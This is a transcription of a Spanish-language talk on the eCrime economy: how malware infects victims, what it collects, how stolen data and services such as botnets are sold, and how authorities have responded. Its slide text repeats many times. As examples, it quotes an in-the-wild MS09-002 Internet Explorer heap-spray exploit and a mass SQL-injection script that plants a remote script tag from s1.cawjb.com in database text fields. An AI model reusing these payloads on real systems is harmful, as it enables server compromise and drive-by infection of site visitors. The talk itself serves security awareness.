eCrime y la industria del malware - Edge
Transcripción
eCrime y la industria del malware - Edge
eCrime y la industria del malware Vicente Díaz ¿Qué es eCrime? ¿Qué es eCrime? ¿Qué es eCrime? ¿Qué es eCrime? eCrime Inc. Walmart eCrime Inc Microsoft 400.000 300.000 200.000 100.000 0 15a de la Fortune 500 País 58 de 197 PIB entre EAU y Nueva Zelanda (y esto antes de la crisis!) No son un grupo de amigos ... Fase 1: Infección el último virus “bueno” W32.Blaster.Worm (2003): billy gates why do you make this possible ? Stop making money and fix your software!! el último virus “bueno” W32.Blaster.Worm (2003): billy gates why do you make this possible ? Stop making money and fix your software!! el último virus “bueno” W32.Blaster.Worm (2003): billy gates why do you make this possible ? Stop making money and fix your software!! el último virus “bueno” W32.Blaster.Worm (2003): billy gates why do you make this possible ? Stop making money and fix your software!! Si tuvieses TODOS los antivirus instalados ... Detección alrededor del 30% Varias muestras con detección de 5% para abajo... ¿por qué? Troyanos, rootkits y malware Pero... ¿cómo logran la infección los troyanos? Instalar -> Siguiente -> Acepto -> Siguiente -> Finalizar Pero... ¿cómo logran la infección los troyanos? Instalar -> Siguiente -> Acepto -> Siguiente -> Finalizar No todos los usuarios son “idiotas” Ejemplos recientes MS09-002: Parche 10 de Febrero Exploit in-the-wild, 17 de Febrero Cientos de dominios sirviendo el exploit Principalmente, localizados en China Ejemplo de patch-reversing … Ejemplos recientes var c=c0+c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16+c17+c18+c19+c20+c21+ c22+c23+c24+c25+c26+c27+c28+c29+c30+c31+c32+c33+c34+c35+c36+c37+c38+c39+c40+c41+c 42+c43+c44+c45+c46+c47+c48+c49+c50+c51+c52+c53+c54+c55+c56+c57+c58+c59+c60+c61+c6 2+c63+c64+c65+c66+c67+c68+c69+c70+c71+c72+c73+c74+c75+c76+c77+c78+c79+c80+c81+c82 +c83+c84+c85+c86+c87+c88+c89+c90+c91+c92+c93+c94+c95+c96+c97+c98+c99+c100+c101+c1 02+c103+c104+c105+c106+c107+c108+c109+c110+c111+c112+c113+c114+c115+c116+c117+c11 8+c119+c120+c121+c122+c123+c124+c125+c126+c127+c128+c129+c130+c131+c132+c133+c134 +c135+c136+c137+c138+c139+c140+c141+c142+c143+c144+c145+c146+c147+c148+c149+c150+ c151+c152+c153+c154+c155+c156+c157+c158+c159+c160+c161+c162+c163+c164+c165+c166+c1 67+c168+c169+c170+c171+c172+c173+c174+c175+c176+c177+c178+c179+c180+c181; var array = new Array(); var ls = 0x100000-(c.length*2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { array[i] = lh + c; } CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); MS09-002: Parche 10 de Febrero Exploit in-the-wild, 17 de Febrero Cientos de dominios sirviendo el exploit Principalmente, localizados en China Ejemplo de patch-reversing function ok() { o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; } </script> Ejemplos recientes Adobe Reader 0-day (PDF) Descubiertos exploits a principios de Febrero, el fabricante no era consciente de la vulnerabilidad. Se rumorea que puede estar circulando desde Diciembre. Parche oficial previsto para 11 de Marzo. Disponible un parche “no oficial” desde finales de Febrero. Uhm, pero ¿como se distribuye? Sitios maliciosos Sitios legítimos (infecciones masivas) Spam (en varios grados de peligrosidad) Vulnerabilidades S.O. (p.e. Conficker) Malvertising Botnets de distribución ¿Botnet? ¿El spam es efectivo? ¿El spam es efectivo? ¿El spam es efectivo? Infecciones masivas Inyección SQL indiscriminada Cientos de miles de afectados Infecciones masivas DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) Inyección SQL indiscriminada OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC( 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http:// s1.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Cientos de miles de afectados Infecciones masivas DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) Inyección SQL indiscriminada OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC( 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http:// s1.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Cientos de miles de afectados Infecciones masivas DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) Inyección SQL indiscriminada OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC( 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http:// s1.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Cientos de miles de afectados Malvertising Varios vectores de ataque Fase 2: Recolección Pero... ¿por qué a mi? Presentando: Paneles de control Presentando: Paneles de control Ejemplo de kit de malware 00FAA7CF5.php Scanners result : 11/32 (34.38%) HTML/MS06006.DF!exploit; Exploit-MS06-006.gen 99FFC5BA4.php Scanners result : 6/32 (18.75%) Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN CCF45A00D.php Scanners result : 15/32 (46.88%) HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A EF57CCF90.php Scanners result : 18/30 (60%) JS/MS05-054!exploit; Exp/MS06071-A FF5B341AC.php Scanners result : 10/32 (31.25%) Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014 Ejemplo de kit de malware 00FAA7CF5.php Scanners result : 11/32 (34.38%) HTML/MS06006.DF!exploit; Exploit-MS06-006.gen 99FFC5BA4.php Scanners result : 6/32 (18.75%) Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN CCF45A00D.php Scanners result : 15/32 (46.88%) HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A EF57CCF90.php Scanners result : 18/30 (60%) JS/MS05-054!exploit; Exp/MS06071-A FF5B341AC.php Scanners result : 10/32 (31.25%) Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014 Ejemplo de kit de malware 00FAA7CF5.php Scanners result : 11/32 (34.38%) HTML/MS06006.DF!exploit; Exploit-MS06-006.gen 99FFC5BA4.php Scanners result : 6/32 (18.75%) Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN CCF45A00D.php Scanners result : 15/32 (46.88%) HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A EF57CCF90.php Scanners result : 18/30 (60%) JS/MS05-054!exploit; Exp/MS06071-A FF5B341AC.php Scanners result : 10/32 (31.25%) Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014 Principales familias ZeuS Sinowal Infostealer Conficker Zeus La historia de A-Z Primeras distribuciones: SPAM Múltiples variantes “no oficiales” Ejecutable en /Run Inyección HTML, redirección, captura Zeus La historia de A-Z Primeras distribuciones: SPAM Múltiples variantes “no oficiales” Ejecutable en /Run Inyección HTML, redirección, captura Zeus La historia de A-Z Primeras distribuciones: SPAM Múltiples variantes “no oficiales” Ejecutable en /Run Inyección HTML, redirección, captura Zeus La historia de A-Z Primeras distribuciones: SPAM Múltiples variantes “no oficiales” Ejecutable en /Run Inyección HTML, redirección, captura Zeus La historia de A-Z Primeras distribuciones: SPAM Múltiples variantes “no oficiales” Ejecutable en /Run Inyección HTML, redirección, captura Sinowal Desde el 2005: SPAM (adjunto) y vuln IE Evolución: Exe -> Dll (svchost) -> MBR (pila TCP/IP propia) Inyección dinámica, algoritmo generación dominios Estado actual Sinowal Desde el 2005: SPAM (adjunto) y vuln IE Evolución: Exe -> Dll (svchost) -> MBR (pila TCP/IP propia) Inyección dinámica, algoritmo generación dominios Estado actual Sinowal Desde el 2005: SPAM (adjunto) y vuln IE Evolución: Exe -> Dll (svchost) -> MBR (pila TCP/IP propia) Inyección dinámica, algoritmo generación dominios Estado actual InfoStealer Muy bajo nivel de detección Capacidad de control remoto Petición de coordenadas adicionales: tras recolección, parece que empieza la cosecha. InfoStealer Muy bajo nivel de detección Capacidad de control remoto Petición de coordenadas adicionales: tras recolección, parece que empieza la cosecha. Conficker Aprovecha la MS08-067 casi en paralelo a la aparición del parche. Más de 9 millones de PCs infectados. Descarga falso Antivirus (de momento). Propagación como Worm. Conficker Aprovecha la MS08-067 casi en paralelo a la aparición del parche. Más de 9 millones de PCs infectados. Descarga falso Antivirus (de momento). Propagación como Worm. Conficker Aprovecha la MS08-067 casi en paralelo a la aparición del parche. Más de 9 millones de PCs infectados. Descarga falso Antivirus (de momento). Propagación como Worm. Conficker Aprovecha la MS08-067 casi en paralelo a la aparición del parche. Más de 9 millones de PCs infectados. Descarga falso Antivirus (de momento). Propagación como Worm. Más datos robados Más datos robados Fase 3: Mercado Bienes y servicios Originalmente: quién robaba los datos, los explotaba. Hoy en día el mercado es mucho más rico. Creadores Venta de packs de malware Robo/modificación de packs de malware Creación de troyanos (también a medida) Evolución del mercado: algunos packs se regalan, se vende el mantenimiento/ actualizaciones. Competencia: ofertas, regalo servicios adicionales. Malware packs Adrenalin 3000$ Firepack 300$ (3000$ cuando salío al mercado) 76service: malware as a service web interface. De 1000$ a 2000$. NeoSploit: varía, pero son miles de USD. Intermediación Escrow Calidad de servicio (SPAM) Bullet proof ISPs Anonimación tráfico Explotación Venta de datos “raw” Venta de datos “limpios”: tarjetas, historial bancario, credenciales bancarias, juegos online Alquiler botnets Envío SPAM Denegación de servicio CCTrading (demo) Más servicios Rompe - captchas Lavado de dinero Pantallazos a texto Más servicios Rompe - captchas Lavado de dinero Pantallazos a texto Presencia en el “mundo real” Muleros Transferencias fraudulentas Carderz Money laundering Compra-venta ebay, egold, comprar tarjetas regalo Troyano que cifra el disco: pide rescate a través de egold directamente Servicio profesional ofrecido en el mercado negro Y, cómo no, las mulas Money laundering Compra-venta ebay, egold, comprar tarjetas regalo Troyano que cifra el disco: pide rescate a través de egold directamente Servicio profesional ofrecido en el mercado negro Y, cómo no, las mulas Money laundering Compra-venta ebay, egold, comprar tarjetas regalo Troyano que cifra el disco: pide rescate a través de egold directamente Servicio profesional ofrecido en el mercado negro Y, cómo no, las mulas Money laundering Compra-venta ebay, egold, comprar tarjetas regalo Troyano que cifra el disco: pide rescate a través de egold directamente Servicio profesional ofrecido en el mercado negro Y, cómo no, las mulas Más servicios Socks/proxy Telefonistas soporte phishing (varios idiomas) Servicios de traducción Man in the middle Man in the browser (?) Venta actualizaciones HTML Injection Más servicios Socks/proxy Telefonistas soporte phishing (varios idiomas) Servicios de traducción Man in the middle Man in the browser (?) Venta actualizaciones HTML Injection Mercado Competencia Malware que limpia otro malware Robo y modificación de packs “hackeo” de paneles de control Competencia I've been using Zeus for over an year now, and while Iotro managed to Malware que limpia malware create a botnet of 100k infected hosts someone hijacked from me Robo y modificación de itpacks by adding a new user and changing “hackeo” de paneles de control my default layout to orange just to tip once he did it Mercado totalmente maduro Alquiler botnets ZeuS: tan barato que no vale la pena comprar y distribuir el troyano. Phishing: el precio/hora de un phisher es igual al precio marginal del mercado. Fase 4: Respuesta El panorama no es halagüeño Pero no todo está perdido. mccolo mccolo mccolo estdomains estdomains estdomains estdomains The termination of ICANN-accredited registrar EstDomains is to go ahead, effective 24 November 2008. On 28 October 2008, ICANN sent a notice of termination to EstDomains, Inc. (EstDomains) based on an Estonian Court record reflecting the conviction of EstDomains' then president, Vladimir Tsastsin, of credit card fraud, money laundering and document forgery. darkmarket Más golpes Sinowal: autores detenidos, intrusión de RSA, red no activa desde hace meses Detención de Iceman. Condena a “mulas” en España. Arrestos por ataques DDoS. Quizá el mayor golpe es el aumento de la concienciación colectiva, mayor difusión de este tipo de noticias. Tendencias de futuro Rootkits evolucionados Nuevas plataformas (MAC OsX) Infecciones masivas Más formatos afectados Routers caseros Secuestro de cuentas Conclusiones Negocio profesional. Por desgracia, el fraude va un paso por delante. Las medidas actuales NO son despreciables NI suficientes. Necesaria cooperación. Y por supuesto, tener claro qué tipo de mundillo es este ... Conclusiones Negocio profesional. Por desgracia, el fraude va un paso por delante. Las medidas actuales NO son despreciables NI suficientes. Necesaria cooperación. Y por supuesto, tener claro qué tipo de mundillo es este ... Preguntas Gracias [email protected] [email protected]